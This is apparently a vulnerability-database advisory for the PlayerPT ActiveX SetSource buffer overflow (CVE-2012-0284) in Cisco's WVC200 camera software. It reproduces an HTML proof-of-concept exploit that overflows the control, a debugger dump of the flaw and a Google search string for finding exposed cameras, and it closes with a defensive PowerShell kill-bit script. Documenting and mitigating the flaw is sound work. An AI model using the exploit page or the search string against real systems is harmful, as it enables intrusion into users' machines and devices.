Cisco Linksys PlayerPT ActiveX Control 'SetSource' Method Buffer Overflow Vulnerability

Vulnerability ID: 1120994    Vulnerability type: Buffer overflow
Published: 2012-03-22    Updated: 2012-07-17
CVE: CVE-2012-0284    CNNVD-ID: CNNVD-201207-391
Platform: Windows    CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/18641
https://www.securityfocus.com/bid/54588
https://cxsecurity.com/issue/WLB-2012080024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201207-391
|Vulnerability details
A stack-based buffer overflow exists in the SetSource method of the Cisco Linksys PlayerPT ActiveX control (PlayerPT.ocx) version 1.0.0.15, shipped with the Cisco WVC200 Wireless-G PTZ Internet camera. A remote attacker can exploit it to execute arbitrary code by supplying a long URL in the first argument (the sURL parameter).
|Vulnerability EXP
<!--
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX 
Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability

when viewing the device web interface it asks
to install an ActiveX control with the following settings:

ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True

try this google dork for WVC200:
linksys wireless-g ptz inurl:main.cgi

Vulnerability:
the SetSource() method is vulnerable to a buffer overflow
vulnerability. Quickly, ollydbg dump:

...
03238225   8B5424 20        mov edx,dword ptr ss:[esp+20]
03238229   894424 10        mov dword ptr ss:[esp+10],eax
0323822D   B9 32000000      mov ecx,32
03238232   33C0             xor eax,eax
03238234   8B72 F8          mov esi,dword ptr ds:[edx-8]
03238237   8DBC24 E8020000  lea edi,dword ptr ss:[esp+2E8]
0323823E   F3:AB            rep stos dword ptr es:[edi]
03238240   8B3D 0C062603    mov edi,dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
03238246   52               push edx
03238247   8D8C24 EC020000  lea ecx,dword ptr ss:[esp+2EC]
0323824E   68 48612603      push PlayerPT.03266148                   ; ASCII "%s"
03238253   51               push ecx
03238254   FFD7             call edi <---------------boom
...

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj'>
</object>
<script>
var x="";
for (var i=0; i<13999; i++){
    x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>
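As an added defender-side example (not part of the advisory or rgod's PoC), the following PowerShell audits whether the Internet Explorer kill bit is set for the PlayerPT control's CLSID listed in the PoC header and applies it where it is missing. It assumes Microsoft's documented ActiveX Compatibility registry location and the 0x400 Compatibility Flags value, and also checks the Wow6432Node path used by 32-bit IE on 64-bit Windows.

```powershell
# Added example (not from the advisory): audit/apply the IE kill bit for PlayerPT.ocx.
# The CLSID is the one listed in the PoC header; the registry location and the 0x400
# "kill bit" flag are Microsoft's documented ActiveX Compatibility mechanism.
$Clsid   = '{9E065E4A-BD9D-4547-8F90-985DC62A5591}'
$KillBit = 0x400
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    # 32-bit IE on 64-bit Windows reads the WOW64-redirected hive
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Get-KillBitStatus {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return 'absent' }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return 'absent' }
    if (($flags -band $KillBit) -eq $KillBit) { 'set' } else { 'not set' }
}

function Set-KillBit {
    # Requires an elevated shell; preserves any other compatibility flags already present.
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { $flags = 0 }
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($flags -bor $KillBit) -Force | Out-Null
}

# Is the control registered on this host at all? (32-bit registrations on x64 live under Wow6432Node)
$registered = @("HKLM:\SOFTWARE\Classes\CLSID\$Clsid",
                "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$Clsid") | Where-Object { Test-Path $_ }
Write-Output ("PlayerPT control registered: " + [bool]$registered)

foreach ($p in $Paths) {
    $status = Get-KillBitStatus -Path $p
    Write-Output "$p -> kill bit $status"
    if ($status -ne 'set') {
        Set-KillBit -Path $p
        Write-Output "  applied; now $(Get-KillBitStatus -Path $p)"
    }
}
```

The kill bit only blocks instantiation in Internet Explorer and other hosts that honour it; removing PlayerPT.ocx or upgrading the camera firmware's control is the complete fix.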
|Affected products
Cisco Wireless-G PTZ Internet Video Camera WVC200 0
|References

Source: secunia.com
Link: http://secunia.com/secunia_research/2012-25/
Source: NSFOCUS
Name: 20194
Link: http://www.nsfocus.net/vulndb/20194